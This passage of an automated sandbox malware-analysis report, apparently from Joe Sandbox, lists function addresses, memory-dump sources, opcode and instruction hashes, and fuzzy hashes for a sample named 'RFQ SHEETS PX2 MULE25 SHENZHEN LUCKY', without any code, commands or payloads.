                                                                                                                                                                                                • Opcode ID: 657afc2af1621e4d22bb17d1f16aff81ad14a0dce22c6171afdc0c41f5e62cec
                                                                                                                                                                                                • Instruction ID: fa512a9b205753d6a7179b06fd9f7d8150b2aba4dcce4d21cddb605039a9ba6e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 657afc2af1621e4d22bb17d1f16aff81ad14a0dce22c6171afdc0c41f5e62cec
                                                                                                                                                                                                • Instruction Fuzzy Hash: 34F01DB5E1030AAFDB44DFA9C945BAEBFF5BB08300F104969E514E7342D7749601CB94
                                                                                                                                                                                                Function 080BE8C1 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: c2dece727dc072e8152eaf4d0c596f67c9da72a30e50a330181405490c65f809
                                                                                                                                                                                                • Instruction ID: aabf9ed9f93f6ba8322c55359bb35730cab2ad895858d7419ca50b41a09efe49
                                                                                                                                                                                                • Opcode Fuzzy Hash: c2dece727dc072e8152eaf4d0c596f67c9da72a30e50a330181405490c65f809
                                                                                                                                                                                                • Instruction Fuzzy Hash: 06E065723497A26FC7071A15AC204FE7F674FD5122709406BF855CB192CA65CA1253A1
                                                                                                                                                                                                Function 080B4C60 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: f688e24a28d9f9fc8d01dbc90b00aa7c08aca4a1ab9238abc36d1657e1aab083
                                                                                                                                                                                                • Instruction ID: bbf8f1ad806b5a9a9dc2c9ae1a04277c29f2ce09f6fd25deff7ddd8511c22243
                                                                                                                                                                                                • Opcode Fuzzy Hash: f688e24a28d9f9fc8d01dbc90b00aa7c08aca4a1ab9238abc36d1657e1aab083
                                                                                                                                                                                                • Instruction Fuzzy Hash: 00F0DAB0D0430A9FDB84DFA9C841AAEBBF5FB48700F1045AAD518E7341D7709A008BD4
                                                                                                                                                                                                Function 080BE8D0 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: c2157e388e73ad88befba4e72f4203335ef20aa8f5a6b1e84e6596cccb114589
                                                                                                                                                                                                • Instruction ID: 86f12c6117125056f40a38102eeac4143dc7ae70b25a70f292ebfb01a3e27b8a
                                                                                                                                                                                                • Opcode Fuzzy Hash: c2157e388e73ad88befba4e72f4203335ef20aa8f5a6b1e84e6596cccb114589
                                                                                                                                                                                                • Instruction Fuzzy Hash: C2E06535304255BB4F461F5998148FF7F6BDFD8222704842AFC55C6251CA31C92197A1
                                                                                                                                                                                                Function 080B4BFA Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 6ab8e93b74ec74168cfe8a84fb28e68b4aeefbe9e6cb85b70dbee33de03aa879
                                                                                                                                                                                                • Instruction ID: b1d3c3a2f2048e363e539ee81ef137a4b8df83ee9ca111178e8389e27ef17820
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ab8e93b74ec74168cfe8a84fb28e68b4aeefbe9e6cb85b70dbee33de03aa879
                                                                                                                                                                                                • Instruction Fuzzy Hash: 34E06DB1D0020AAFD740EF79C90968EBBF1FF08600F11846AD019EB211E7709A418F96
                                                                                                                                                                                                Function 06815C87 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 7ca4093bad10b46fba1b06c8bcd547732b885928e5f44ddbadde0e9594282410
                                                                                                                                                                                                • Instruction ID: 453c00256f2ce172098bee53c462176ebe3a40807b446ffb8f8d424747d4a205
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ca4093bad10b46fba1b06c8bcd547732b885928e5f44ddbadde0e9594282410
                                                                                                                                                                                                • Instruction Fuzzy Hash: 95E08631A1064057D394961AA8487AB7B9ED7C4660F58846EE54AC3240CE654843CB94
                                                                                                                                                                                                Function 0819F3CF Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 443eb98bb39f5436f28c4574517cd82c17749e6ba8124ddedd2a8cd1feba239e
                                                                                                                                                                                                • Instruction ID: 422cacb52b780ab9f38928849b667bf782c4c6b1c01c3e94251b6275e0aec065
                                                                                                                                                                                                • Opcode Fuzzy Hash: 443eb98bb39f5436f28c4574517cd82c17749e6ba8124ddedd2a8cd1feba239e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4EF0BDB4C0126DCFCB68CF60C946BE9BBB1BF09301F1054D9D64AA6254DB755B81CF90
                                                                                                                                                                                                Function 06815C98 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 7e3dd5fdce527882b4693276b797c1697da16357161ade3f46001e6baec67cb8
                                                                                                                                                                                                • Instruction ID: 79adda3f16ce6515a4c4701bf2c813fd562e78ed48f63e29bcea50a904020681
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e3dd5fdce527882b4693276b797c1697da16357161ade3f46001e6baec67cb8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 73D05E3270425013D399526AA8086AB7B9F8BC9660F0880AAE54A833409D655C428794
                                                                                                                                                                                                Function 080B4C08 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: ef93bf16982a0e3c046eeaf036a3f1f4a026f6b4f2f35b1e29f1527fe59e5510
                                                                                                                                                                                                • Instruction ID: 9987b3959be54a5ce57e0b85a98a9f12605503060886e96e1cbfb3e9192da601
                                                                                                                                                                                                • Opcode Fuzzy Hash: ef93bf16982a0e3c046eeaf036a3f1f4a026f6b4f2f35b1e29f1527fe59e5510
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8FE092B0D4060A9FD780EFA9CA05A9EBBF5AB08600F1185A9D019EB312E7749A058F95
                                                                                                                                                                                                Function 017272C0 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: b9625d5572a0f8fd92760af487263a1903b2c2793288d69fc7a50e82bf575b3e
                                                                                                                                                                                                • Instruction ID: bfe5863f786ae44422806dc8e35a2c9e2a1f2b0866f88a5571b5d7813807b430
                                                                                                                                                                                                • Opcode Fuzzy Hash: b9625d5572a0f8fd92760af487263a1903b2c2793288d69fc7a50e82bf575b3e
                                                                                                                                                                                                • Instruction Fuzzy Hash: EAD0C23050C3654FC342E72AE8184197BA7EFA1201300C595A0080A52ECAB81CD48390
                                                                                                                                                                                                Function 06816448 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 5942602265d6316960d59d3efe5ab4e367a59f3f8410077c178b985dac7e50d0
                                                                                                                                                                                                • Instruction ID: dc6e7d7b4e72d7b888b92ed494207960f2dfe8a9c9046c6d3a2fb4b904b82dca
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5942602265d6316960d59d3efe5ab4e367a59f3f8410077c178b985dac7e50d0
                                                                                                                                                                                                • Instruction Fuzzy Hash: F8D0A731B142944BDBA1CB3878140AD7BA6EFD373D714027ED7A1D7492CA764413EB54
                                                                                                                                                                                                Function 06815CC8 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: ca68cf621c075a64f0743b899c7fbb146cbaef3f9a1bf029818e010af2031897
                                                                                                                                                                                                • Instruction ID: 03a8b2f0aa1af5021a932f4ae37dc7845b7c9ca1e83ad6529623adb1d0386ae1
                                                                                                                                                                                                • Opcode Fuzzy Hash: ca68cf621c075a64f0743b899c7fbb146cbaef3f9a1bf029818e010af2031897
                                                                                                                                                                                                • Instruction Fuzzy Hash: E5C0123134052453C544A74C781569D378D6785660F881519D417CB141CB950A024BCA
                                                                                                                                                                                                Function 068165A9 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 9ba3e96ba4f90e082a0349c3a5920d0ff5ae5e883d86ebe0e967d7ff3472a8ff
                                                                                                                                                                                                • Instruction ID: f924a5ee41d2bd25f39445ad6e21a6f3114d4a8bc09db1de49d01de15cf89a26
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ba3e96ba4f90e082a0349c3a5920d0ff5ae5e883d86ebe0e967d7ff3472a8ff
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1AD0123724F2916FD70585B8B8918C6BF74F45213130D40ABC584C6483C11A5419CB75
                                                                                                                                                                                                Function 017272D0 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: ddd9c3018573f2efcda4c4070160537dc43e4440f1349d1fb8dae88010be0e53
                                                                                                                                                                                                • Instruction ID: d6c77afdedc6a7bcf0dba9afad9635aa175c95b1c1d557d7aca3cd6982972d1f
                                                                                                                                                                                                • Opcode Fuzzy Hash: ddd9c3018573f2efcda4c4070160537dc43e4440f1349d1fb8dae88010be0e53
                                                                                                                                                                                                • Instruction Fuzzy Hash: 95C012302143394BC641E766E85995977ABFBA0602740D914A0090611DDEF81CD44790
                                                                                                                                                                                                Function 080BD820 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 1039dab77c4fe6ff92057923b304ef34073ab4f864c35f12baf3eb434c461009
                                                                                                                                                                                                • Instruction ID: a294d18d83b9b3038b167be4238c796224f5ed310b926092f1dded9e58b521d7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1039dab77c4fe6ff92057923b304ef34073ab4f864c35f12baf3eb434c461009
                                                                                                                                                                                                • Instruction Fuzzy Hash: 99C0125684E3D15FCF035B2018220CB3F721D13300B0912C7E8848B1A3D1285A1AC3A3
                                                                                                                                                                                                Function 06815CD8 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: fc1654c1642056d72bede77be034cc3a725bbe65f35ae403a57039d87b5cb238
                                                                                                                                                                                                • Instruction ID: 8cde79b155f5386bb4d2b7c79ba9475916e32ef7b28f4662f6cab7fccd2c50c5
                                                                                                                                                                                                • Opcode Fuzzy Hash: fc1654c1642056d72bede77be034cc3a725bbe65f35ae403a57039d87b5cb238
                                                                                                                                                                                                • Instruction Fuzzy Hash: B8B0122334453813084971DD3C208BF728D49859B0308046BE50DCF3408D851E5143DF
                                                                                                                                                                                                Function 068163B1 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 944400b864705aaab04cecbf3146c66fd3d60bac6ce560184deee3ac924951a3
                                                                                                                                                                                                • Instruction ID: efcb5472800ba4c0512d84c0f5359ce319e298065cd3705859720eea57727cbb
                                                                                                                                                                                                • Opcode Fuzzy Hash: 944400b864705aaab04cecbf3146c66fd3d60bac6ce560184deee3ac924951a3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3AA0021678022815FA98B9BA3C617BE520B97C0A65F04846AF66DDD5C4CC7A489113C9

                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                Function 06812E08 Relevance: 11.0, Strings: 8, Instructions: 964COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: (bq$Hbq$Hbq$Hbq$Hbq$Hbq$Hbq$PH^q
                                                                                                                                                                                                • API String ID: 0-3076519024
                                                                                                                                                                                                • Opcode ID: e3fec15e4336d3759b667477aa84c6b9302a56e55d65fc93fecd3244658cebb5
                                                                                                                                                                                                • Instruction ID: 34c38b86cc392410a701ccac1137c65afb6154b3d0b68cf82282e90a2cc27d2d
                                                                                                                                                                                                • Opcode Fuzzy Hash: e3fec15e4336d3759b667477aa84c6b9302a56e55d65fc93fecd3244658cebb5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9162AF30B102148FDB94AB78C85466E7BA6FFC8711F248569E51ADB3A1CF34DD42CB91
                                                                                                                                                                                                Function 080A0DC0 Relevance: 2.7, Strings: 2, Instructions: 167COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: #HBF$#HBF
                                                                                                                                                                                                • API String ID: 0-136798975
                                                                                                                                                                                                • Opcode ID: 4f2af02287b34015a67c26258954a4be63fab7128567fd72359c100851587d77
                                                                                                                                                                                                • Instruction ID: 26fc32a53e50623127b8e516a51670545eaefb77bd53a63ae297721fe873cf53
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f2af02287b34015a67c26258954a4be63fab7128567fd72359c100851587d77
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3861E174E0560DDBCB08CFA9C5849EEFBF2FF89311F24952AD415BB214D7309A128B65
                                                                                                                                                                                                Function 080A0DB0 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: #HBF$w*S
                                                                                                                                                                                                • API String ID: 0-2996935253
                                                                                                                                                                                                • Opcode ID: 62bc495d2c94ecba8fded10387409d10992ace4777be46416e5d7a547cb2ce59
                                                                                                                                                                                                • Instruction ID: 45693d3a5327b0e1fc05a9b890cfb3b8e9fcf3f57ecb102485ee5f9504371ae5
                                                                                                                                                                                                • Opcode Fuzzy Hash: 62bc495d2c94ecba8fded10387409d10992ace4777be46416e5d7a547cb2ce59
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D61D274E0560DCFCB08CFA9C9809EEFBF2EF89311F28952AD415B7214D7349A528B65
                                                                                                                                                                                                Function 080A07DE Relevance: 2.7, Strings: 2, Instructions: 154COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: @$@
                                                                                                                                                                                                • API String ID: 0-693420146
                                                                                                                                                                                                • Opcode ID: 127aade9cd02be02476a095199c739f7e591deb15659250f54d62d14221c6544
                                                                                                                                                                                                • Instruction ID: e0db220b44b06489fe852dcfad46900ca904b32cf45ce62853694adf651669b0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 127aade9cd02be02476a095199c739f7e591deb15659250f54d62d14221c6544
                                                                                                                                                                                                • Instruction Fuzzy Hash: AD61F4B4D0260DDBDB04CFEAD9816EEBBF2BF88301F14941AD465A7244D7349A81CF98
                                                                                                                                                                                                Function 080A0B79 Relevance: 2.6, Strings: 2, Instructions: 119COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: A{]z$}\%G
                                                                                                                                                                                                • API String ID: 0-4271377017
                                                                                                                                                                                                • Opcode ID: 9e9e462d49bd49089459042292b448d961af910a629ba35c440818894c19ebe0
                                                                                                                                                                                                • Instruction ID: 7933cab19502d9c3184a67f0f1af587eb9c6ddfce6c1ae6f139c5764cb293415
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e9e462d49bd49089459042292b448d961af910a629ba35c440818894c19ebe0
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0341F6B0D1460EDFCB04CFAAC5815EEFBF2AB88315F24D42AC515B7254E7349A428F94
                                                                                                                                                                                                Function 080A0B88 Relevance: 2.6, Strings: 2, Instructions: 113COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: A{]z$}\%G
                                                                                                                                                                                                • API String ID: 0-4271377017
                                                                                                                                                                                                • Opcode ID: 0bdc88dc1bf3e793cff294a140c42685c6eaabda707bbe5dc52f39d5c5d755b1
                                                                                                                                                                                                • Instruction ID: 6f164d6474311f15653d6400be4284139d2c7dd5bd75abcbc0a0a7acd69aa004
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0bdc88dc1bf3e793cff294a140c42685c6eaabda707bbe5dc52f39d5c5d755b1
                                                                                                                                                                                                • Instruction Fuzzy Hash: AE41E6B0D1460EDFCB44CFAAC5805EEFBB2AB88315F24D42AC515B7214E7349A418F94
                                                                                                                                                                                                Function 068252C0 Relevance: 1.6, Strings: 1, Instructions: 327COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477860803.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6820000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: Xbq
                                                                                                                                                                                                • API String ID: 0-63242295
                                                                                                                                                                                                • Opcode ID: 2489de6e91055a844a7884f198bbdc6376804103367faca43646e6ebd6e7d32d
                                                                                                                                                                                                • Instruction ID: 6a2f790a5ce53053cf750009bc885565c1497619e93a955e0c3a6f58ef83e84a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2489de6e91055a844a7884f198bbdc6376804103367faca43646e6ebd6e7d32d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 50B19770F4526BCBDB781F25499923E77A2AFC0A46F644C29D942DA198DE34C8C1CB93
                                                                                                                                                                                                Function 080A04E0 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: yS^Z
                                                                                                                                                                                                • API String ID: 0-4128205011
                                                                                                                                                                                                • Opcode ID: 0354cee270965e82a9e62d859eea3e72ecb5c53789a426a1424f7dc68879392f
                                                                                                                                                                                                • Instruction ID: a11c712c1ad074a7d5585a25c93b537e8ca832e2f3fadc697194ea6e4452d50b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0354cee270965e82a9e62d859eea3e72ecb5c53789a426a1424f7dc68879392f
